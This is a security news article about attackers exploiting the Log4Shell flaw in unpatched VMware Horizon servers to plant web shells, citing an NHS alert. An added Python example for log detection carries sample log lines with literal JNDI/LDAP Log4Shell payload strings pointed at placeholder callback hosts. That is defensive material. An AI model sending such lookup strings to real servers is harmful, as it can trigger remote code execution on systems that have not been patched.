
NHS warns of hackers exploiting Log4j flaw in VMware Horizon


The NHS digital security team has raised the alarm about active exploitation of the Log4Shell vulnerability in unpatched VMware Horizon servers by an unknown threat actor, who drops malicious web shells and establishes persistence on affected networks for follow-on attacks.

“The attack may include a reconnaissance phase where the attacker uses the Java Naming and Directory Interface (JNDI) to call back into the malicious infrastructure via the Log4Shell payload,” the non-sector public agency said in an alert. “Once the vulnerability was discovered, the attack used Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injected a web shell into the VM Blast Secure Gateway service.”
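As an added example (not taken from the NHS alert or the original article), the following Python code shows how a defender could search web access logs for the JNDI callback described above and list the LDAP hosts to cross-check against egress logs. The log format, sample lines, host names and function names are constructed assumptions, and it matches only the literal lookup string after percent-decoding.

```python
import re
from urllib.parse import unquote

# Literal JNDI lookup as it appears in a logged request field, after decoding.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.IGNORECASE)

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded forms converge."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_callbacks(log_lines):
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(log_lines, start=1):
        match = JNDI_RE.search(decode_fully(line))
        if match:
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "scheme": match["scheme"].lower(),
                "callback_host": match["host"].lower(),
            })
    return findings

def ldap_callback_hosts(findings):
    """Hosts named in LDAP/LDAPS lookups: candidates for egress-log review."""
    return sorted({f["callback_host"] for f in findings if f["scheme"] in ("ldap", "ldaps")})

# Constructed sample lines (documentation IP ranges and example.* hosts only).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Jan/2022:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.net:1389/a}"',
    '203.0.113.9 - - [05/Jan/2022:10:02:40 +0000] "GET /?x=%24%7BJNDI%3ALDAP%3A%2F%2Fcallback.example.net%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.23 - - [05/Jan/2022:10:05:00 +0000] "GET /?q=%2524%257Bjndi%253Adns%253A%252F%252Fprobe.example.org%257D HTTP/1.1" 400 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_jndi_callbacks(SAMPLE_LOG):
        print(finding)
    print("LDAP callback hosts:", ldap_callback_hosts(find_jndi_callbacks(SAMPLE_LOG)))
```

A hit in the access log only shows that a lookup string was received; an outbound connection from the server to one of the listed hosts is the signal that the lookup was actually resolved.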


Once deployed, a web shell can serve as a conduit for a number of post-exploitation activities, such as deploying additional malware, exposing data, or deploying ransomware. VMware Horizon versions 7.x and 8.x are vulnerable to the Log4j vulnerability.


Log4Shell is an exploit for CVE-2021-44228 (CVSS score: 10.0), a critical arbitrary remote code execution vulnerability in Apache Log4j 2, a ubiquitous open source logging framework. It has been used as part of different malware campaigns since it was exposed in December 2021. To date, a range of hacking groups, from nation-state actors to ransomware cartels, have exploited the vulnerability.


The development also marks the second time a VMware product has been exploited through the vulnerability in the Log4j library. Last month, AdvIntel researchers disclosed that attackers were targeting systems running VMware vCenter Server with the aim of installing the Conti ransomware.

For its part, VMware released security updates last month for Horizon, vCenter and other products affected by Log4Shell. The virtualization service provider acknowledged scan attempts in the wild and urged customers to install the patches, or temporarily apply workarounds where applicable, to address any potential risks.


